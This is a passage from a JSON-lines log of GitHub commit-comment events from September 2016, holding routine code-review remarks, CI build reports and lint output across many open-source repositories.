usage.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/minecrafter/voxelwind/commit/fe8d1cebd2aa3a61216b81524f39d76aea5ac99d#commitcomment-19115054>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGc0Wthc46iAcsaNEEzJhXwQ3PajIcXcks5qsUUGgaJpZM4KCwZ->\n> .\n>\n"}},"created_at":"2016-09-21T16:58:35Z"}
{"id":"4597580523","type":"CommitCommentEvent","actor":{"login":"kaustubh-karkare"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19117026,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T17:00:58Z","updated_at":"2016-09-21T17:00:58Z","body":"GraphQL subscription payloads are handled by the same logic that is used to process mutation payloads, and right now, without this `clientMutationId`, it would throw. I'm new to this codebase, and so I wasn't aware of #736, but looking at the code, that would solve the problem too.\r\n\r\ncc @josephsavona. Should this particular change be reverted as part of that PR?"}},"created_at":"2016-09-21T17:00:58Z"}
{"id":"4597582795","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19117028,"position":null,"line":null,"path":null,"commit_id":"a9e11b68b4dee10cb9e1a519c78a89d919c3b9db","created_at":"2016-09-21T17:01:22Z","updated_at":"2016-09-21T17:01:22Z","body":"Sorry, but I'd need more guidance on that structured type. (I understand\n\"structured type\", but I don't know where to begin in this case.) As a\nstopgap compromise, I added a remember table to the type. Perhaps a cached\nremember table would be better. Also, I see now that LO(anything) was just\nplain wrong, and I changed it to specfunc(LO).\n\nOn Wed, Sep 21, 2016 at 8:23 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> That's an amusing way to do it. But let's not do that -- please build a\n> proper 'structured type', which does not do any actual computation.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/a9e11b68b4dee10cb9e1a519c78a89d919c3b9db#commitcomment-19112718>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9YTDw1BdSSAJsbtqJUr64-njtJ3hks5qsSG-gaJpZM4KCvGb>\n> .\n>\n"}},"created_at":"2016-09-21T17:01:22Z"}
{"id":"4597592345","type":"CommitCommentEvent","actor":{"login":"gilmoskowitz"},"repo":{"name":"ChristopherCotnoir/xtuple"},"payload":{"comment":{"id":19117050,"position":40,"line":40,"path":"test/database/functions/adjustinvvalue.js","commit_id":"83b5da2cfa923fd77a19fef4977c83ddc53d70cd","created_at":"2016-09-21T17:03:06Z","updated_at":"2016-09-21T17:03:06Z","body":"Since line 3 `require`s dblib, it would be better to call [dblib.assertErrorCode()](https://github.com/xtuple/xtuple/blob/4_11_x/test/database/dblib.js#L16) here. Then if we change the format of the messages in the future, the test will be less sensitive to the change and it'll be easier to find places that need to change."}},"created_at":"2016-09-21T17:03:06Z"}
{"id":"4597595162","type":"CommitCommentEvent","actor":{"login":"alonka1"},"repo":{"name":"alonka1/test_1"},"payload":{"comment":{"id":19117056,"position":null,"line":null,"path":null,"commit_id":"a8c1811e73f711194fcd27b127dbcba235f61d48","created_at":"2016-09-21T17:03:38Z","updated_at":"2016-09-21T17:03:38Z","body":"hjgjhgj"}},"created_at":"2016-09-21T17:03:38Z"}
{"id":"4597596882","type":"CommitCommentEvent","actor":{"login":"alonka1"},"repo":{"name":"alonka1/test_1"},"payload":{"comment":{"id":19117062,"position":null,"line":null,"path":null,"commit_id":"a8c1811e73f711194fcd27b127dbcba235f61d48","created_at":"2016-09-21T17:03:58Z","updated_at":"2016-09-21T17:03:58Z","body":"welcom\r\n"}},"created_at":"2016-09-21T17:03:58Z"}
{"id":"4597597178","type":"CommitCommentEvent","actor":{"login":"kolkov"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19117063,"position":null,"line":null,"path":null,"commit_id":"71bfaa0599f897f47418300d144de523f6232021","created_at":"2016-09-21T17:04:01Z","updated_at":"2016-09-21T17:04:01Z","body":"Thanks! Was built and working fine now!"}},"created_at":"2016-09-21T17:04:01Z"}
{"id":"4597597548","type":"CommitCommentEvent","actor":{"login":"taion"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19117065,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T17:04:05Z","updated_at":"2016-09-21T17:04:05Z","body":"In implementing Relay subscriptions in userspace, the only place where this has come up is in needing `clientMutationId` (and some `__typename` bits) for `RANGE_ADD` configs.\r\n\r\nI haven't needed `clientMutationId` elsewhere and currently do not use it."}},"created_at":"2016-09-21T17:04:05Z"}
{"id":"4597599267","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19117066,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T17:04:24Z","updated_at":"2016-09-21T17:04:24Z","body":"Re: refresh_db\r\nSaltStacks preference is 'filename' instead of \"filename\" i.e use single instead of double?  Might be worth adding to the style code.\r\n\r\nL487 Collecting all the failed to deletes and raising it at the end is a good change/pickup, matches the rest of the behavior of the code I added.   I am expecting not being able to delete  is a file in use or a permission denied or does not exist."}},"created_at":"2016-09-21T17:04:24Z"}
{"id":"4597610482","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19117087,"position":124,"line":251,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T17:06:23Z","updated_at":"2016-09-21T17:06:23Z","body":"You're correct. Probably, I was still thinking about your proposed changes above when I wrote this."}},"created_at":"2016-09-21T17:06:23Z"}
{"id":"4597612598","type":"CommitCommentEvent","actor":{"login":"tokumotion"},"repo":{"name":"cardcorp/fbRads"},"payload":{"comment":{"id":19117088,"position":null,"line":null,"path":null,"commit_id":"87ad33f0f57db6ee33e4734a8fd8e15232248eec","created_at":"2016-09-21T17:06:33Z","updated_at":"2016-09-21T17:06:33Z","body":"@prasoonsrivas hey, the solution is in #28. Check the last comments."}},"created_at":"2016-09-21T17:06:33Z"}
{"id":"4597612629","type":"CommitCommentEvent","actor":{"login":"abhijitbhongle"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19117089,"position":null,"line":null,"path":null,"commit_id":"0d570a506a1b51f5333c7741c47e714d55c35ab2","created_at":"2016-09-21T17:06:33Z","updated_at":"2016-09-21T17:06:33Z","body":"Stuck here as the rootView.addView(wordView); line gives a nullpointerexception error and cant seems to resolve it.\r\nWhat can be done to remove this and move on?"}},"created_at":"2016-09-21T17:06:33Z"}
{"id":"4597614116","type":"CommitCommentEvent","actor":{"login":"booo"},"repo":{"name":"freifunk-berlin/firmware"},"payload":{"comment":{"id":19117090,"position":null,"line":null,"path":null,"commit_id":"25c5e4409a4af3a5eaa2cefe6b28d4c9d02b00a0","created_at":"2016-09-21T17:06:49Z","updated_at":"2016-09-21T17:06:49Z","body":"We could remove \"wikimedia\"..."}},"created_at":"2016-09-21T17:06:49Z"}
{"id":"4597614774","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19117094,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-21T17:06:57Z","updated_at":"2016-09-21T17:06:57Z","body":"I mean it built with the 2 commits you cherry-picked last time I tried. This was before devcon."}},"created_at":"2016-09-21T17:06:57Z"}
{"id":"4597619171","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19117103,"position":212,"line":376,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T17:07:45Z","updated_at":"2016-09-21T17:07:45Z","body":"The check that the 1-bits are contiguous and at the correct position is done in IPNetwork::create()"}},"created_at":"2016-09-21T17:07:45Z"}
{"id":"4597620226","type":"CommitCommentEvent","actor":{"login":"nishthaarora"},"repo":{"name":"nishthaarora/openDoorEvents"},"payload":{"comment":{"id":19117105,"position":null,"line":null,"path":null,"commit_id":"1e7fef336ed09b43eb05845711096dfe9794a3df","created_at":"2016-09-21T17:07:56Z","updated_at":"2016-09-21T17:07:56Z","body":"sure i will look into it for sure"}},"created_at":"2016-09-21T17:07:56Z"}
{"id":"4597626026","type":"CommitCommentEvent","actor":{"login":"night"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19117115,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-21T17:09:02Z","updated_at":"2016-09-21T17:09:02Z","body":"I cannot reproduce that. Additionally, what else does it break apart from not showing BetterTTV settings?"}},"created_at":"2016-09-21T17:09:02Z"}
{"id":"4597634780","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19117136,"position":null,"line":null,"path":null,"commit_id":"d1cecfa132a9a5d8896a2ae34c528b40ea25d111","created_at":"2016-09-21T17:10:36Z","updated_at":"2016-09-21T17:10:36Z","body":"@abisz Like I said above. I didn't manage to install a JSX transformer and ES6 transpiler and still get the \"glue\" going w/ Angular.\r\n\r\nWith the current implementation I can expect to see some nasty code, which will most probably have to be rewritten somewhen in the future. \r\n\r\nSince for the current version we don't have enough time, we will have to postpone it until the next version, which could then include the new editor and drag&drop functionality. "}},"created_at":"2016-09-21T17:10:36Z"}
{"id":"4597637291","type":"CommitCommentEvent","actor":{"login":"2319367578"},"repo":{"name":"2319367578/Resume"},"payload":{"comment":{"id":19117139,"position":null,"line":null,"path":null,"commit_id":"6d5bf1fa8a6c384da3d01a873d0bbc571bbcff0a","created_at":"2016-09-21T17:11:05Z","updated_at":"2016-09-21T17:11:05Z","body":"1"}},"created_at":"2016-09-21T17:11:05Z"}
{"id":"4597637739","type":"CommitCommentEvent","actor":{"login":"2319367578"},"repo":{"name":"2319367578/Resume"},"payload":{"comment":{"id":19117142,"position":null,"line":null,"path":null,"commit_id":"6d5bf1fa8a6c384da3d01a873d0bbc571bbcff0a","created_at":"2016-09-21T17:11:10Z","updated_at":"2016-09-21T17:11:10Z","body":"2"}},"created_at":"2016-09-21T17:11:10Z"}
{"id":"4597637754","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"makoto-ogata/array-test"},"payload":{"comment":{"id":19117143,"position":11,"line":11,"path":"js/index.js","commit_id":"fe2fb74922a3a98831a7b84511593f0649c67767","created_at":"2016-09-21T17:11:10Z","updated_at":"2016-09-21T17:11:10Z","body":"小さな課題：appendではなく、appendToを使って書くように変更できますか？\r\n"}},"created_at":"2016-09-21T17:11:10Z"}
{"id":"4597638054","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19117145,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-21T17:11:13Z","updated_at":"2016-09-21T17:11:13Z","body":"121784677-OAControllerFixes4633 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-21T17:11:13Z"}
{"id":"4597640464","type":"CommitCommentEvent","actor":{"login":"LaecioMenezes"},"repo":{"name":"LaecioMenezes/SGE"},"payload":{"comment":{"id":19117152,"position":45,"line":45,"path":"sge-app.sln","commit_id":"1a863150aaf19256e81ba71ad812d135b4274c7e","created_at":"2016-09-21T17:11:40Z","updated_at":"2016-09-21T17:11:40Z","body":"vvvvv"}},"created_at":"2016-09-21T17:11:40Z"}
{"id":"4597642393","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19117161,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-21T17:12:02Z","updated_at":"2016-09-21T17:12:02Z","body":"121784677-OAControllerFixes4633 (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T17:12:02Z"}
{"id":"4597643142","type":"CommitCommentEvent","actor":{"login":"jackwoodward"},"repo":{"name":"SignalR/SignalR"},"payload":{"comment":{"id":19117162,"position":null,"line":null,"path":null,"commit_id":"6ce631433b57505b0b3f1fe24f68f0681fca5aef","created_at":"2016-09-21T17:12:10Z","updated_at":"2016-09-21T17:12:10Z","body":"I think when the hub is in azure the request should wait no longer than the azure idle connection timeout which by default is 4 minutes. From what I've observed if any request is open and no data is sent for 4 minutes the request will be terminated on the server side with no error raised on the client. Additionally it seems that rolling updates through a cloud service also trigger this server side only drop of requests. My experience is with azure cloud services so other hosting options in azure might have different behavior."}},"created_at":"2016-09-21T17:12:10Z"}
{"id":"4597646853","type":"CommitCommentEvent","actor":{"login":"ebeshero"},"repo":{"name":"PPH3/Eldritch"},"payload":{"comment":{"id":19117168,"position":null,"line":null,"path":null,"commit_id":"ed5c47b10a1d05a97753dec68e90310ce5350e5b","created_at":"2016-09-21T17:12:52Z","updated_at":"2016-09-21T17:12:52Z","body":"Wonderfully creepy pic! 👍 "}},"created_at":"2016-09-21T17:12:52Z"}
{"id":"4597647722","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"CyanogenMod/android_device_samsung_serranoltexx"},"payload":{"comment":{"id":19117170,"position":null,"line":null,"path":null,"commit_id":"66ecc719ace9b37ae94cbcc77a99242cfe855ad0","created_at":"2016-09-21T17:13:02Z","updated_at":"2016-09-21T17:13:02Z","body":"Yes, this just changes the initial default value to 3G. You can still manually change it to LTE."}},"created_at":"2016-09-21T17:13:02Z"}
{"id":"4597652672","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19117185,"position":null,"line":null,"path":null,"commit_id":"5211ac39d40f5b926ff1cc0e7fda69784fe0735b","created_at":"2016-09-21T17:14:00Z","updated_at":"2016-09-21T17:14:00Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.252.5211ac39d40f5b926ff1cc0e7fda69784fe0735b](http://build.palaso.org/viewLog.html?buildId=77015&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:11"}},"created_at":"2016-09-21T17:14:00Z"}
{"id":"4597653260","type":"CommitCommentEvent","actor":{"login":"L3K0V"},"repo":{"name":"elsys/survival-guide"},"payload":{"comment":{"id":19117187,"position":51,"line":51,"path":"12-terminal.md","commit_id":"5a8197dc886170ebb4843936f546b5efcb1927b9","created_at":"2016-09-21T17:14:07Z","updated_at":"2016-09-21T17:14:07Z","body":"😞 "}},"created_at":"2016-09-21T17:14:07Z"}
{"id":"4597655524","type":"CommitCommentEvent","actor":{"login":"lucas42"},"repo":{"name":"Financial-Times/endpoint-manager"},"payload":{"comment":{"id":19117199,"position":31,"line":143,"path":"index.js","commit_id":"62c81b5b60a174c5ff3062c591a0b26557c3dd8d","created_at":"2016-09-21T17:14:31Z","updated_at":"2016-09-21T17:14:31Z","body":"This is based on the fact we dynamically do `endpoint.baseurl = endpoint.protocol+\"://\"+endpoint.id+\"/\";`\r\nSo as there's no id yet, we start with http:/// and update on fly as the user types in an ID."}},"created_at":"2016-09-21T17:14:31Z"}
{"id":"4597655677","type":"CommitCommentEvent","actor":{"login":"raphaottoni"},"repo":{"name":"camilalaranjeira/RPV-VGG19"},"payload":{"comment":{"id":19117200,"position":null,"line":null,"path":null,"commit_id":"97f83120d06f1a8c20b30564c1ba2ccdaa0156b1","created_at":"2016-09-21T17:14:32Z","updated_at":"2016-09-21T17:14:32Z","body":"Olá Igor,\r\n\r\nContinua dando segmentation fault aqui tanto no mac como no ubuntu =/"}},"created_at":"2016-09-21T17:14:32Z"}
{"id":"4597658224","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19117209,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T17:15:01Z","updated_at":"2016-09-21T17:15:01Z","body":"Re: _get_repo_details or _get_repo_src_dest_details\r\nI was expecting to see this as a class, when I started to read the code above it. I will have a look at python collections\r\n\r\nGood idea to cache the results, given how often its called.\r\n\r\nI had it like this at one stage\r\n```\r\nstat_result = os.stat(winrepo_file)\r\nmtime = stat_result.st_mtime\r\nwinrepo_age = time.time() - mtime\r\n```\r\nthen I shorten it to\r\n`winrepo_age = time.time()-os.stat(winrepo_file).st_mtime`\r\nDoes making it multiple lines help with raise error pointing out the issue.\r\n\r\nGood point, If you can not state the winrepo.p  for some reason other than not existing, more than likely salt-minion will not be able to update it\r\n"}},"created_at":"2016-09-21T17:15:01Z"}
{"id":"4597663045","type":"CommitCommentEvent","actor":{"login":"josemiki"},"repo":{"name":"luigy-mach/compiladores"},"payload":{"comment":{"id":19117217,"position":4,"line":0,"path":"vector_tokens/Makefile","commit_id":"269b9f4faa8d4f7ce01ddad36331564c5d13f5e6","created_at":"2016-09-21T17:15:53Z","updated_at":"2016-09-21T17:15:53Z","body":"Que no compila con C++11"}},"created_at":"2016-09-21T17:15:53Z"}
{"id":"4597663431","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19117220,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-21T17:15:58Z","updated_at":"2016-09-21T17:15:58Z","body":"121784677-OAControllerFixes4633 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1802 of 2375 tests passed, 0 test warnings)\n\n * 573 tests had: AUD diffs.\n * 11 tests had: RDD diffs.\n * 5 tests had: EIO diffs.\n * 3 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.87%25-red.svg)</a> \n"}},"created_at":"2016-09-21T17:15:58Z"}
{"id":"4597673263","type":"CommitCommentEvent","actor":{"login":"navidR"},"repo":{"name":"navidR/ChakraCore"},"payload":{"comment":{"id":19117246,"position":null,"line":null,"path":null,"commit_id":"b793e1377115aabd475af1c7885cb44dd3b303d9","created_at":"2016-09-21T17:17:43Z","updated_at":"2016-09-21T17:17:43Z","body":"ASFAIK in every platform first parameter in argv will be program name itself, so it is pointless to check program name itself to flags. "}},"created_at":"2016-09-21T17:17:43Z"}
{"id":"4597680707","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19117262,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-21T17:19:06Z","updated_at":"2016-09-21T17:19:06Z","body":"@Ravenstine I really like how this is coming together - nice work! \r\n\r\nI do think the grid math is the biggest remaining blocker to considering this work ready for a pull request. Let me look over the code a bit more and then we can get together this afternoon and talk through it."}},"created_at":"2016-09-21T17:19:06Z"}
{"id":"4597687027","type":"CommitCommentEvent","actor":{"login":"aschaeffer"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":19117278,"position":19,"line":73,"path":"inexor/entity/EntitySystem.hpp","commit_id":"0d36c67b4151fc01a768afc4a868cba596372d10","created_at":"2016-09-21T17:20:16Z","updated_at":"2016-09-21T17:20:16Z","body":"Nope, I replaced the old type storing mechanism with the new c++11 method."}},"created_at":"2016-09-21T17:20:16Z"}
{"id":"4597688034","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19117281,"position":null,"line":null,"path":null,"commit_id":"f645e8530369fd416628aaec5fce1705edc74a02","created_at":"2016-09-21T17:20:26Z","updated_at":"2016-09-21T17:20:26Z","body":"[R/convert_merge_table_to_phyloseq_otu_table.R:17:1:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/R/convert_merge_table_to_phyloseq_otu_table.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​convert_merge_table_to_phyloseq_otu_table <- function(filepath, TAXON){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_merge_table_to_phyloseq_otu_table.R:25:40:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/R/convert_merge_table_to_phyloseq_otu_table.R#L25) *warning:* **no visible binding for global variable ‘LEVEL’**\n```r\n​  taxa_level_table <- base::subset(df, LEVEL == TAXON, select=-c(LEVEL))\n                                       ^~~~~\n```\n[R/convert_merge_table_to_phyloseq_otu_table.R:25:40:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/R/convert_merge_table_to_phyloseq_otu_table.R#L25) *warning:* **no visible binding for global variable ‘LEVEL’**\n```r\n​  taxa_level_table <- base::subset(df, LEVEL == TAXON, select=-c(LEVEL))\n                                       ^~~~~\n```\n[R/convert_merge_table_to_phyloseq_otu_table.R:25:62:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/R/convert_merge_table_to_phyloseq_otu_table.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  taxa_level_table <- base::subset(df, LEVEL == TAXON, select=-c(LEVEL))\n                                                            ~^~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:4:8:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L4) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​dat <- convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"class\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:26:2:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L26) *style:* **Commented code should be removed.**\n```r\n​#expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/nonexistantfile.txt\", \"class\"), throws_error())\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:27:1:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L27) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:27:13:](https://github.com/seninp-bioinfo/MetaComp/blob/f645e8530369fd416628aaec5fce1705edc74a02/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L27) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-21T17:20:26Z"}
{"id":"4597697930","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19117305,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-21T17:22:14Z","updated_at":"2016-09-21T17:22:14Z","body":"In the case where you depend on some specific behavior for the items, then yes. Binary tree is a good example where you need a `Less` method.\r\n\r\nKeep in mind that even in a statically typed language with generics, you still need to declare what \"behavior\" that your input requires. The main thing is that those other languages typically have built-in methods. For example, the '<' operator would be syntactic sugar for just calling the `Less` method. If Go ends up supporting generics, I'm fairly certain that every primitive type in Go will have built-in methods."}},"created_at":"2016-09-21T17:22:14Z"}
{"id":"4597699733","type":"CommitCommentEvent","actor":{"login":"ldennedy"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":19117312,"position":5,"line":10,"path":"_layouts/standard.html","commit_id":"cde059498c70ecc44d811b88f0488464c9cbe177","created_at":"2016-09-21T17:22:33Z","updated_at":"2016-09-21T17:22:33Z","body":"This was supposed to say \"remove heading for standard layout\" so it was separate from change in style.css"}},"created_at":"2016-09-21T17:22:33Z"}
{"id":"4597702202","type":"CommitCommentEvent","actor":{"login":"secretdataz"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19117325,"position":6,"line":6,"path":"db/import-tmpl/sc_config.conf","commit_id":"dd6ef41b0907201f3701ee4a082afcaf1afbc79c","created_at":"2016-09-21T17:22:59Z","updated_at":"2016-09-21T17:22:59Z","body":"script_constants.h"}},"created_at":"2016-09-21T17:22:59Z"}
{"id":"4597707059","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":19117338,"position":16,"line":68,"path":"frontend/App.vue","commit_id":"1a70dd1d51856730e586c18790b01cd82fe49773","created_at":"2016-09-21T17:23:51Z","updated_at":"2016-09-21T17:23:51Z","body":"Use `let` 😉 "}},"created_at":"2016-09-21T17:23:51Z"}
{"id":"4597716412","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19117360,"position":null,"line":null,"path":null,"commit_id":"bab3c09fca2f213984af2221f857a5d262164f04","created_at":"2016-09-21T17:25:32Z","updated_at":"2016-09-21T17:25:32Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MQBuxx_VTNios1I5cV17sQ"}},"created_at":"2016-09-21T17:25:32Z"}
{"id":"4597717966","type":"CommitCommentEvent","actor":{"login":"Agotado"},"repo":{"name":"TeamAPK/ITTAPK"},"payload":{"comment":{"id":19117365,"position":null,"line":null,"path":null,"commit_id":"c1be50f49503de9e3bf7876fc7b8b6fb4c984a33","created_at":"2016-09-21T17:25:48Z","updated_at":"2016-09-21T17:25:48Z","body":"Damn son :b"}},"created_at":"2016-09-21T17:25:48Z"}
{"id":"4597719039","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19117369,"position":101,"line":72,"path":"css/1_header.scss","commit_id":"07c7b39e6eb256c464ed2595c12ba4c840830b27","created_at":"2016-09-21T17:26:00Z","updated_at":"2016-09-21T17:26:00Z","body":"styled-divs is pretty generic sounding. Do something like \"nav-rectangle-shapes\""}},"created_at":"2016-09-21T17:26:00Z"}
